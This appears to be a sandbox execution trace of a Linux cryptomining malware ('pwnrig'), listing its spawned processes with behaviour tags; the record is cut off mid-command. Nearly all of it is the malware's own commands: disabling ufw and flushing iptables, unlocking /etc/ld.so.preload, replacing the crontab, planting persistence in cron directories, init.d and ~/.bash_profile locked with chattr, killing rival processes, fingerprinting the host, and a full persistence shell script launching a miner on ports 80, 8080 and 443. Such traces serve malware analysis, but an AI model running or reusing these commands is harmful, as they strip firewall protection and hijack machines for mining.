  - - /usr/bin/chattr
      chattr +i +a /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr
      4⤵
      PID:2858
  - - /usr/bin/which
      which chkconfig
      4⤵
      PID:2859
  - - /usr/bin/which
      which update-rc.d
      4⤵
      PID:2860
  - - /usr/bin/chattr
      chattr -i -a /etc/init.d/pwnrig /bin/initdr
      4⤵
      PID:2861
  - - /usr/sbin/update-rc.d
      update-rc.d -f pwnrig disable
      4⤵
      PID:2862
    - - /usr/local/sbin/systemctl
        
        systemctl --quiet disable pwnrig
        5⤵
        
        PID:2863
    - - /usr/local/bin/systemctl
        
        systemctl --quiet disable pwnrig
        5⤵
        
        PID:2863
    - - /usr/sbin/systemctl
        
        systemctl --quiet disable pwnrig
        5⤵
        
        PID:2863
    - - /usr/bin/systemctl
        
        systemctl --quiet disable pwnrig
        5⤵
        
        PID:2863
    - - /usr/local/sbin/systemctl
        
        systemctl daemon-reload
        5⤵
        
        PID:2889
    - - /usr/local/bin/systemctl
        
        systemctl daemon-reload
        5⤵
        
        PID:2889
    - - /usr/sbin/systemctl
        
        systemctl daemon-reload
        5⤵
        
        PID:2889
    - - /usr/bin/systemctl
        
        systemctl daemon-reload
        5⤵
        Reads EFI boot settings
        
        PID:2889
  - - /usr/sbin/update-rc.d
      update-rc.d -f pwnrig remove
      4⤵
      PID:2915
    - - /usr/local/sbin/systemctl
        
        systemctl daemon-reload
        5⤵
        
        PID:2916
    - - /usr/local/bin/systemctl
        
        systemctl daemon-reload
        5⤵
        
        PID:2916
    - - /usr/sbin/systemctl
        
        systemctl daemon-reload
        5⤵
        
        PID:2916
    - - /usr/bin/systemctl
        
        systemctl daemon-reload
        5⤵
        Reads EFI boot settings
        
        PID:2916
  - - /usr/bin/rm
      rm -rf /bin/initdr
      4⤵
      PID:2942
  - - /usr/bin/cp
      cp -f -r -- /tmp/service-agent /bin/initdr
      4⤵
      Writes file to system bin folder
      PID:2943
  - - /usr/bin/tee
      tee /etc/init.d/pwnrig
      4⤵
      Modifies init.d
      PID:2945
  - - /usr/bin/sed
      sed -i "1 s/-e //" /etc/init.d/pwnrig
      4⤵
      Modifies init.d
      PID:2946
  - - /usr/bin/chmod
      chmod +x /etc/init.d/pwnrig /bin/initdr
      4⤵
      PID:2947
  - - /usr/sbin/update-rc.d
      update-rc.d pwnrig defaults
      4⤵
      PID:2948

/usr/bin/klibsystem5
./klibsystem5
1⤵
PID:1777

/usr/bin/hostname
hostname -I
1⤵
PID:2158

/usr/bin/awk
awk "{print \$1}"
1⤵
PID:2160

/usr/bin/awk
awk "{print \"-\"\$2}"
1⤵
PID:2165

/usr/bin/head
head -n 1
1⤵
PID:2164

/usr/bin/grep
grep "Port "
1⤵
PID:2163

/usr/bin/cat
cat /etc/ssh/sshd_config
1⤵
PID:2162

/usr/bin/sed
sed -e "s/\$//"
1⤵
PID:2174

/usr/bin/sed
sed -e "s/^ *//"
1⤵
PID:2173

/usr/bin/cut
cut -d: -f2
1⤵
PID:2172

/usr/bin/grep
grep -m 1 "model name" /proc/cpuinfo
1⤵
- Checks CPU configuration
PID:2171

/usr/bin/awk
awk "{print \$1}"
1⤵
PID:2177

/usr/bin/awk
awk "{print \$4}"
1⤵
PID:2180

/usr/bin/awk
awk "{print \$4}"
1⤵
PID:2183

/usr/bin/hostname
hostname -I
1⤵
- Attempts to change immutable files
PID:2553

/usr/bin/awk
awk "{print \$1}"
1⤵
PID:2555

/usr/bin/awk
awk "{print \"-\"\$2}"
1⤵
PID:2560

/usr/bin/head
head -n 1
1⤵
PID:2559

/usr/bin/grep
grep "Port "
1⤵
PID:2558

/usr/bin/cat
cat /etc/ssh/sshd_config
1⤵
PID:2557

/usr/bin/sed
sed -e "s/\$//"
1⤵
PID:2569

/usr/bin/sed
sed -e "s/^ *//"
1⤵
PID:2568

/usr/bin/cut
cut -d: -f2
1⤵
PID:2567

/usr/bin/grep
grep -m 1 "model name" /proc/cpuinfo
1⤵
- Checks CPU configuration
PID:2566

/usr/bin/awk
awk "{print \$1}"
1⤵
PID:2572

/usr/bin/awk
awk "{print \$4}"
1⤵
PID:2575

/usr/bin/awk
awk "{print \$4}"
1⤵
PID:2578

/usr/bin/wc
wc -l
1⤵
PID:2603

/usr/bin/awk
awk "{if(\$3>30.0) print \$2}"
1⤵
PID:2602

/usr/bin/grep
grep -- "-bash[[:space:]]*\$"
1⤵
PID:2601

/usr/bin/grep
grep -v grep
1⤵
PID:2600

/usr/bin/ps
ps aux
1⤵
- Reads CPU attributes
- Reads runtime system information
PID:2599

/var/tmp/.klibsystem5-x
/var/tmp/.klibsystem5-x
1⤵
- Executes dropped EXE
PID:2604
- /usr/bin/bash
  bash -c "ufw disable"
  2⤵
  PID:2608
- /usr/sbin/ufw
  ufw disable
  2⤵
  PID:2608
- - /usr/sbin/iptables
    /usr/sbin/iptables -V
    3⤵
    PID:2609
- - /lib/ufw/ufw-init
    /lib/ufw/ufw-init force-stop
    3⤵
    PID:2610
  - - /sbin/ip6tables
      ip6tables -L INPUT -n
      4⤵
      PID:2611
  - - /sbin/iptables
      iptables -F ufw-logging-deny
      4⤵
      PID:2612
  - - /sbin/iptables
      iptables -F ufw-logging-allow
      4⤵
      PID:2613
  - - /sbin/iptables
      iptables -F ufw-not-local
      4⤵
      Flushes firewall rules
      PID:2614
  - - /sbin/iptables
      iptables -F ufw-user-logging-input
      4⤵
      PID:2615
  - - /sbin/iptables
      iptables -F ufw-user-limit-accept
      4⤵
      Flushes firewall rules
      PID:2616
  - - /sbin/iptables
      iptables -F ufw-user-limit
      4⤵
      PID:2617
  - - /sbin/iptables
      iptables -F ufw-skip-to-policy-input
      4⤵
      PID:2618
  - - /sbin/iptables
      iptables -F ufw-reject-input
      4⤵
      PID:2619
  - - /sbin/iptables
      iptables -F ufw-after-logging-input
      4⤵
      PID:2620
  - - /sbin/iptables
      iptables -F ufw-after-input
      4⤵
      PID:2621
  - - /sbin/iptables
      iptables -F ufw-user-input
      4⤵
      Flushes firewall rules
      PID:2622
  - - /sbin/iptables
      iptables -F ufw-before-input
      4⤵
      PID:2623
  - - /sbin/iptables
      iptables -F ufw-before-logging-input
      4⤵
      Attempts to change immutable files
      PID:2624
  - - /sbin/iptables
      iptables -F ufw-skip-to-policy-forward
      4⤵
      PID:2625
  - - /sbin/iptables
      iptables -F ufw-reject-forward
      4⤵
      PID:2626
  - - /sbin/iptables
      iptables -F ufw-after-logging-forward
      4⤵
      Flushes firewall rules
      PID:2627
  - - /sbin/iptables
      iptables -F ufw-after-forward
      4⤵
      PID:2628
  - - /sbin/iptables
      iptables -F ufw-user-logging-forward
      4⤵
      PID:2629
  - - /sbin/iptables
      iptables -F ufw-user-forward
      4⤵
      PID:2630
  - - /sbin/iptables
      iptables -F ufw-before-forward
      4⤵
      PID:2631
  - - /sbin/iptables
      iptables -F ufw-before-logging-forward
      4⤵
      Flushes firewall rules
      PID:2632
  - - /sbin/iptables
      iptables -F ufw-track-forward
      4⤵
      PID:2633
  - - /sbin/iptables
      iptables -F ufw-track-output
      4⤵
      PID:2634
  - - /sbin/iptables
      iptables -F ufw-track-input
      4⤵
      PID:2635
  - - /sbin/iptables
      iptables -F ufw-skip-to-policy-output
      4⤵
      PID:2636
  - - /sbin/iptables
      iptables -F ufw-reject-output
      4⤵
      PID:2637
  - - /sbin/iptables
      iptables -F ufw-after-logging-output
      4⤵
      Flushes firewall rules
      PID:2638
  - - /sbin/iptables
      iptables -F ufw-after-output
      4⤵
      PID:2639
  - - /sbin/iptables
      iptables -F ufw-user-logging-output
      4⤵
      PID:2640
  - - /sbin/iptables
      iptables -F ufw-user-output
      4⤵
      PID:2641
  - - /sbin/iptables
      iptables -F ufw-before-output
      4⤵
      PID:2642
  - - /sbin/iptables
      iptables -F ufw-before-logging-output
      4⤵
      PID:2643
  - - /sbin/iptables
      iptables -Z ufw-logging-deny
      4⤵
      PID:2644
  - - /sbin/iptables
      iptables -Z ufw-logging-allow
      4⤵
      PID:2645
  - - /sbin/iptables
      iptables -Z ufw-not-local
      4⤵
      Flushes firewall rules
      PID:2646
  - - /sbin/iptables
      iptables -Z ufw-user-logging-input
      4⤵
      PID:2647
  - - /sbin/iptables
      iptables -Z ufw-user-limit-accept
      4⤵
      PID:2648
  - - /sbin/iptables
      iptables -Z ufw-user-limit
      4⤵
      PID:2649
  - - /sbin/iptables
      iptables -Z ufw-skip-to-policy-input
      4⤵
      PID:2650
  - - /sbin/iptables
      iptables -Z ufw-reject-input
      4⤵
      PID:2651
  - - /sbin/iptables
      iptables -Z ufw-after-logging-input
      4⤵
      PID:2652
  - - /sbin/iptables
      iptables -Z ufw-after-input
      4⤵
      PID:2653
  - - /sbin/iptables
      iptables -Z ufw-user-input
      4⤵
      PID:2654
  - - /sbin/iptables
      iptables -Z ufw-before-input
      4⤵
      PID:2655
  - - /sbin/iptables
      iptables -Z ufw-before-logging-input
      4⤵
      Flushes firewall rules
      PID:2656
  - - /sbin/iptables
      iptables -Z ufw-skip-to-policy-forward
      4⤵
      Flushes firewall rules
      PID:2657
  - - /sbin/iptables
      iptables -Z ufw-reject-forward
      4⤵
      PID:2658
  - - /sbin/iptables
      iptables -Z ufw-after-logging-forward
      4⤵
      PID:2659
  - - /sbin/iptables
      iptables -Z ufw-after-forward
      4⤵
      PID:2660
  - - /sbin/iptables
      iptables -Z ufw-user-logging-forward
      4⤵
      Flushes firewall rules
      PID:2661
  - - /sbin/iptables
      iptables -Z ufw-user-forward
      4⤵
      PID:2662
  - - /sbin/iptables
      iptables -Z ufw-before-forward
      4⤵
      PID:2663
  - - /sbin/iptables
      iptables -Z ufw-before-logging-forward
      4⤵
      PID:2664
  - - /sbin/iptables
      iptables -Z ufw-track-forward
      4⤵
      PID:2665
  - - /sbin/iptables
      iptables -Z ufw-track-output
      4⤵
      PID:2666
  - - /sbin/iptables
      iptables -Z ufw-track-input
      4⤵
      PID:2667
  - - /sbin/iptables
      iptables -Z ufw-skip-to-policy-output
      4⤵
      PID:2668
  - - /sbin/iptables
      iptables -Z ufw-reject-output
      4⤵
      PID:2669
  - - /sbin/iptables
      iptables -Z ufw-after-logging-output
      4⤵
      PID:2670
  - - /sbin/iptables
      iptables -Z ufw-after-output
      4⤵
      Flushes firewall rules
      PID:2671
  - - /sbin/iptables
      iptables -Z ufw-user-logging-output
      4⤵
      PID:2672
  - - /sbin/iptables
      iptables -Z ufw-user-output
      4⤵
      PID:2673
  - - /sbin/iptables
      iptables -Z ufw-before-output
      4⤵
      PID:2674
  - - /sbin/iptables
      iptables -Z ufw-before-logging-output
      4⤵
      PID:2675
  - - /sbin/iptables
      iptables -X ufw-logging-deny
      4⤵
      PID:2676
  - - /sbin/iptables
      iptables -X ufw-logging-allow
      4⤵
      PID:2677
  - - /sbin/iptables
      iptables -X ufw-not-local
      4⤵
      PID:2678
  - - /sbin/iptables
      iptables -X ufw-user-logging-input
      4⤵
      PID:2679
  - - /sbin/iptables
      iptables -X ufw-user-logging-output
      4⤵
      Flushes firewall rules
      PID:2680
  - - /sbin/iptables
      iptables -X ufw-user-logging-forward
      4⤵
      PID:2681
  - - /sbin/iptables
      iptables -X ufw-user-limit-accept
      4⤵
      PID:2682
  - - /sbin/iptables
      iptables -X ufw-user-limit
      4⤵
      PID:2683
  - - /sbin/iptables
      iptables -X ufw-user-input
      4⤵
      PID:2684
  - - /sbin/iptables
      iptables -X ufw-user-forward
      4⤵
      PID:2685
  - - /sbin/iptables
      iptables -X ufw-user-output
      4⤵
      PID:2686
  - - /sbin/iptables
      iptables -X ufw-skip-to-policy-input
      4⤵
      PID:2687
  - - /sbin/iptables
      iptables -X ufw-skip-to-policy-output
      4⤵
      PID:2688
  - - /sbin/iptables
      iptables -X ufw-skip-to-policy-forward
      4⤵
      PID:2689
  - - /sbin/iptables
      iptables -P INPUT ACCEPT
      4⤵
      PID:2690
  - - /sbin/iptables
      iptables -P OUTPUT ACCEPT
      4⤵
      PID:2691
  - - /sbin/iptables
      iptables -P FORWARD ACCEPT
      4⤵
      PID:2692
  - - /sbin/ip6tables
      ip6tables -F ufw6-logging-deny
      4⤵
      PID:2693
  - - /sbin/ip6tables
      ip6tables -F ufw6-logging-allow
      4⤵
      PID:2694
  - - /sbin/ip6tables
      ip6tables -F ufw6-not-local
      4⤵
      PID:2695
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-logging-input
      4⤵
      PID:2696
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-limit-accept
      4⤵
      PID:2697
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-limit
      4⤵
      PID:2698
  - - /sbin/ip6tables
      ip6tables -F ufw6-skip-to-policy-input
      4⤵
      PID:2699
  - - /sbin/ip6tables
      ip6tables -F ufw6-reject-input
      4⤵
      Flushes firewall rules
      PID:2700
  - - /sbin/ip6tables
      ip6tables -F ufw6-after-logging-input
      4⤵
      PID:2701
  - - /sbin/ip6tables
      ip6tables -F ufw6-after-input
      4⤵
      Flushes firewall rules
      PID:2702
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-input
      4⤵
      PID:2703
  - - /sbin/ip6tables
      ip6tables -F ufw6-before-input
      4⤵
      PID:2704
  - - /sbin/ip6tables
      ip6tables -F ufw6-before-logging-input
      4⤵
      Flushes firewall rules
      PID:2705
  - - /sbin/ip6tables
      ip6tables -F ufw6-skip-to-policy-forward
      4⤵
      PID:2706
  - - /sbin/ip6tables
      ip6tables -F ufw6-reject-forward
      4⤵
      PID:2707
  - - /sbin/ip6tables
      ip6tables -F ufw6-after-logging-forward
      4⤵
      Flushes firewall rules
      PID:2708
  - - /sbin/ip6tables
      ip6tables -F ufw6-after-forward
      4⤵
      PID:2709
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-logging-forward
      4⤵
      Flushes firewall rules
      PID:2710
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-forward
      4⤵
      Flushes firewall rules
      PID:2711
  - - /sbin/ip6tables
      ip6tables -F ufw6-before-forward
      4⤵
      PID:2712
  - - /sbin/ip6tables
      ip6tables -F ufw6-before-logging-forward
      4⤵
      PID:2713
  - - /sbin/ip6tables
      ip6tables -F ufw6-track-forward
      4⤵
      PID:2714
  - - /sbin/ip6tables
      ip6tables -F ufw6-track-output
      4⤵
      PID:2715
  - - /sbin/ip6tables
      ip6tables -F ufw6-track-input
      4⤵
      PID:2716
  - - /sbin/ip6tables
      ip6tables -F ufw6-skip-to-policy-output
      4⤵
      PID:2717
  - - /sbin/ip6tables
      ip6tables -F ufw6-reject-output
      4⤵
      PID:2718
  - - /sbin/ip6tables
      ip6tables -F ufw6-after-logging-output
      4⤵
      PID:2719
  - - /sbin/ip6tables
      ip6tables -F ufw6-after-output
      4⤵
      PID:2720
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-logging-output
      4⤵
      PID:2721
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-output
      4⤵
      PID:2722
  - - /sbin/ip6tables
      ip6tables -F ufw6-before-output
      4⤵
      PID:2723
  - - /sbin/ip6tables
      ip6tables -F ufw6-before-logging-output
      4⤵
      PID:2724
  - - /sbin/ip6tables
      ip6tables -Z ufw6-logging-deny
      4⤵
      PID:2725
  - - /sbin/ip6tables
      ip6tables -Z ufw6-logging-allow
      4⤵
      Flushes firewall rules
      PID:2726
  - - /sbin/ip6tables
      ip6tables -Z ufw6-not-local
      4⤵
      PID:2727
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-logging-input
      4⤵
      Attempts to change immutable files
      PID:2728
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-limit-accept
      4⤵
      PID:2729
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-limit
      4⤵
      PID:2730
  - - /sbin/ip6tables
      ip6tables -Z ufw6-skip-to-policy-input
      4⤵
      PID:2731
  - - /sbin/ip6tables
      ip6tables -Z ufw6-reject-input
      4⤵
      PID:2732
  - - /sbin/ip6tables
      ip6tables -Z ufw6-after-logging-input
      4⤵
      Attempts to change immutable files
      PID:2733
  - - /sbin/ip6tables
      ip6tables -Z ufw6-after-input
      4⤵
      PID:2734
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-input
      4⤵
      PID:2735
  - - /sbin/ip6tables
      ip6tables -Z ufw6-before-input
      4⤵
      Attempts to change immutable files
      PID:2736
  - - /sbin/ip6tables
      ip6tables -Z ufw6-before-logging-input
      4⤵
      PID:2737
  - - /sbin/ip6tables
      ip6tables -Z ufw6-skip-to-policy-forward
      4⤵
      PID:2738
  - - /sbin/ip6tables
      ip6tables -Z ufw6-reject-forward
      4⤵
      PID:2739
  - - /sbin/ip6tables
      ip6tables -Z ufw6-after-logging-forward
      4⤵
      PID:2740
  - - /sbin/ip6tables
      ip6tables -Z ufw6-after-forward
      4⤵
      PID:2741
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-logging-forward
      4⤵
      PID:2742
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-forward
      4⤵
      Flushes firewall rules
      PID:2743
  - - /sbin/ip6tables
      ip6tables -Z ufw6-before-forward
      4⤵
      PID:2744
  - - /sbin/ip6tables
      ip6tables -Z ufw6-before-logging-forward
      4⤵
      PID:2745
  - - /sbin/ip6tables
      ip6tables -Z ufw6-track-forward
      4⤵
      PID:2746
  - - /sbin/ip6tables
      ip6tables -Z ufw6-track-output
      4⤵
      PID:2747
  - - /sbin/ip6tables
      ip6tables -Z ufw6-track-input
      4⤵
      PID:2748
  - - /sbin/ip6tables
      ip6tables -Z ufw6-skip-to-policy-output
      4⤵
      PID:2749
  - - /sbin/ip6tables
      ip6tables -Z ufw6-reject-output
      4⤵
      PID:2750
  - - /sbin/ip6tables
      ip6tables -Z ufw6-after-logging-output
      4⤵
      Flushes firewall rules
      PID:2751
  - - /sbin/ip6tables
      ip6tables -Z ufw6-after-output
      4⤵
      Flushes firewall rules
      PID:2752
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-logging-output
      4⤵
      PID:2753
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-output
      4⤵
      PID:2754
  - - /sbin/ip6tables
      ip6tables -Z ufw6-before-output
      4⤵
      PID:2755
  - - /sbin/ip6tables
      ip6tables -Z ufw6-before-logging-output
      4⤵
      Flushes firewall rules
      PID:2756
  - - /sbin/ip6tables
      ip6tables -X ufw6-logging-deny
      4⤵
      PID:2757
  - - /sbin/ip6tables
      ip6tables -X ufw6-logging-allow
      4⤵
      PID:2758
  - - /sbin/ip6tables
      ip6tables -X ufw6-not-local
      4⤵
      PID:2759
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-logging-input
      4⤵
      PID:2760
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-logging-output
      4⤵
      PID:2761
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-logging-forward
      4⤵
      PID:2762
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-limit-accept
      4⤵
      PID:2763
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-limit
      4⤵
      Flushes firewall rules
      PID:2764
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-input
      4⤵
      PID:2765
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-forward
      4⤵
      PID:2766
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-output
      4⤵
      PID:2767
  - - /sbin/ip6tables
      ip6tables -X ufw6-skip-to-policy-input
      4⤵
      PID:2768
  - - /sbin/ip6tables
      ip6tables -X ufw6-skip-to-policy-output
      4⤵
      PID:2769
  - - /sbin/ip6tables
      ip6tables -X ufw6-skip-to-policy-forward
      4⤵
      PID:2770
  - - /sbin/ip6tables
      ip6tables -P INPUT ACCEPT
      4⤵
      PID:2771
  - - /sbin/ip6tables
      ip6tables -P OUTPUT ACCEPT
      4⤵
      PID:2772
  - - /sbin/ip6tables
      ip6tables -P FORWARD ACCEPT
      4⤵
      PID:2773
- /usr/bin/bash
  bash -c "iptables -P INPUT ACCEPT"
  2⤵
  PID:2774
- /usr/sbin/iptables
  iptables -P INPUT ACCEPT
  2⤵
  PID:2774
- /usr/bin/bash
  bash -c "iptables -P OUTPUT ACCEPT"
  2⤵
  PID:2775
- /usr/sbin/iptables
  iptables -P OUTPUT ACCEPT
  2⤵
  PID:2775
- /usr/bin/bash
  bash -c "iptables -P FORWARD ACCEPT"
  2⤵
  PID:2776
- /usr/sbin/iptables
  iptables -P FORWARD ACCEPT
  2⤵
  PID:2776
- /usr/bin/bash
  bash -c "iptables -F"
  2⤵
  PID:2777
- /usr/sbin/iptables
  iptables -F
  2⤵
  PID:2777
- /usr/bin/bash
  bash -c "chattr -ia /etc/ld.so.preload"
  2⤵
  PID:2778
- /usr/bin/chattr
  chattr -ia /etc/ld.so.preload
  2⤵
  PID:2778
- /usr/bin/pgrep
  pgrep -f klibsystem4
  2⤵
  - Reads CPU attributes
  PID:2779
- /usr/bin/pgrep
  pgrep -f klibsystem5
  2⤵
  - Reads CPU attributes
  PID:2780

/usr/bin/hostname
hostname -I
1⤵
- Attempts to change immutable files
PID:2806

/usr/bin/awk
awk "{print \$1}"
1⤵
PID:2808

/usr/bin/awk
awk "{print \"-\"\$2}"
1⤵
PID:2813

/usr/bin/head
head -n 1
1⤵
PID:2812

/usr/bin/grep
grep "Port "
1⤵
PID:2811

/usr/bin/cat
cat /etc/ssh/sshd_config
1⤵
PID:2810

/usr/bin/sed
sed -e "s/\$//"
1⤵
PID:2822

/usr/bin/sed
sed -e "s/^ *//"
1⤵
PID:2821

/usr/bin/cut
cut -d: -f2
1⤵
PID:2820

/usr/bin/grep
grep -m 1 "model name" /proc/cpuinfo
1⤵
- Checks CPU configuration
PID:2819

/usr/bin/awk
awk "{print \$1}"
1⤵
PID:2825

/usr/bin/awk
awk "{print \$4}"
1⤵
PID:2828

/usr/bin/awk
awk "{print \$4}"
1⤵
PID:2831

/usr/bin/crontab
crontab -r
1⤵
PID:3307

/usr/bin/pkill
pkill -f .klibsystem5
1⤵
- Reads CPU attributes
- Reads runtime system information
PID:3308

/usr/bin/pkill
pkill -f .klibsystem4
1⤵
- Reads CPU attributes
PID:3310

/usr/bin/bash
bash -c "echo \"* * * * * /opt/.klibsystem5 >/dev/null 2>&1\" | crontab -"
1⤵
PID:3311
- /usr/bin/crontab
  crontab -
  2⤵
  - Creates/modifies Cron job
  PID:3313

/usr/bin/chattr
chattr -ia /etc/cron.d/.lib-knlib4
1⤵
- Attempts to change immutable files
PID:3314

/usr/bin/chattr
chattr +ia /etc/cron.d/.lib-knlib4
1⤵
PID:3315

/usr/bin/chattr
chattr -ia /var/spool/cron/.lib-knlib4
1⤵
PID:3316

/usr/bin/chattr
chattr +ia /var/spool/cron/.lib-knlib4
1⤵
PID:3317

/usr/bin/chattr
chattr -ia /etc/cron.hourly/.lib-knlib4
1⤵
PID:3318

/usr/bin/chattr
chattr +ia /etc/cron.hourly/.lib-knlib4
1⤵
- Attempts to change immutable files
PID:3319

/usr/bin/chattr
chattr -ia /etc/cron.daily/.lib-knlib4
1⤵
PID:3320

/usr/bin/chattr
chattr +ia /etc/cron.daily/.lib-knlib4
1⤵
PID:3321

/usr/bin/chattr
chattr -ia /etc/cron.weekly/.lib-knlib4
1⤵
PID:3322

/usr/bin/chattr
chattr +ia /etc/cron.weekly/.lib-knlib4
1⤵
PID:3323

/usr/bin/chattr
chattr -ia /etc/cron.monthly/.lib-knlib4
1⤵
- Attempts to change immutable files
PID:3324

/usr/bin/chattr
chattr +ia /etc/cron.monthly/.lib-knlib4
1⤵
PID:3325

/usr/bin/chattr
chattr -ia /etc/anacrontab
1⤵
- Attempts to change immutable files
PID:3326

/usr/bin/chattr
chattr +ia /etc/anacrontab
1⤵
PID:3327

/tmp/sys-helper
/tmp/sys-helper
1⤵
- Executes dropped EXE
- Writes file to tmp directory
PID:3328

/tmp/service-agent
/tmp/service-agent -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d -pwn
1⤵
- Executes dropped EXE
- Checks CPU configuration
- Checks hardware identifiers (DMI)
- Reads CPU attributes
- Reads hardware information
- Enumerates kernel/hardware configuration
PID:3332
- /bin/sh
  sh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""
  2⤵
  - Attempts to change immutable files
  PID:3334
- - /usr/bin/whoami
    whoami
    3⤵
    PID:3345
- - /usr/bin/hostname
    hostname
    3⤵
    PID:3346
- - /usr/bin/grep
    grep -c "^processor" /proc/cpuinfo
    3⤵
    - Checks CPU configuration
    PID:3347
- /bin/sh
  sh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"
  2⤵
  PID:3363
- - /usr/bin/awk
    awk "/[zZ]/ && !a[\$2]++ {print \$2}"
    3⤵
    PID:3365
- - /usr/bin/ps
    ps -A "-ostat,ppid"
    3⤵
    PID:3364
- - /usr/bin/id
    id -u
    3⤵
    PID:3367
- - /usr/bin/grep
    grep -v grep
    3⤵
    PID:3370
- - /usr/bin/grep
    grep /etc/cron
    3⤵
    PID:3369
- - /usr/bin/ps
    ps x
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:3368
- /bin/sh
  sh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then SNIFFDIR='/bin';PWNDIR='/bin'; else rm -rf /tmp/.pwn 2>/dev/null;mkdir /tmp/.pwn 2>/dev/null;SNIFFDIR='/tmp/.pwn';PWNDIR='/tmp';fi;PWNRIG='pwnrig';PWNRIGE='pwnrige';PWNRIGL='pwnrigl';CROND='crondr';SYSD='sysdr';INITD='initdr';BPROFILE='bprofr';MINER='/tmp/service-agent';PROGRAM='-bash';if [ `id -u 2>/dev/null` -eq '0' ]; then chattr -i -a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;fi;rm -rf \$SNIFFDIR/\$BPROFILE 2>/dev/null;sed -i \"/\$BPROFILE/d\" ~/.bash_profile 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$BPROFILE 2>/dev/null;echo \"cp -f -r -- \$SNIFFDIR/\$BPROFILE \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null\" >> ~/.bash_profile 2>/dev/null;if [ `id -u 2>/dev/null` -eq '0' ]; then chattr +i +a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;mkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly 2>/dev/null;chattr -i -a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$CROND 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$CROND 2>/dev/null;echo -e \"#!/bin/bash\\ncp -f -r -- \$SNIFFDIR/\$CROND \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/cron.d/\$PWNRIG /etc/cron.daily/\$PWNRIG /etc/cron.hourly/\$PWNRIG /etc/cron.monthly/\$PWNRIG /etc/cron.weekly/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/cron.*/\$PWNRIG 2>/dev/null;chmod +x /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND 2>/dev/null;chattr +i +a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;if which chkconfig > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;chkconfig \$PWNRIG off 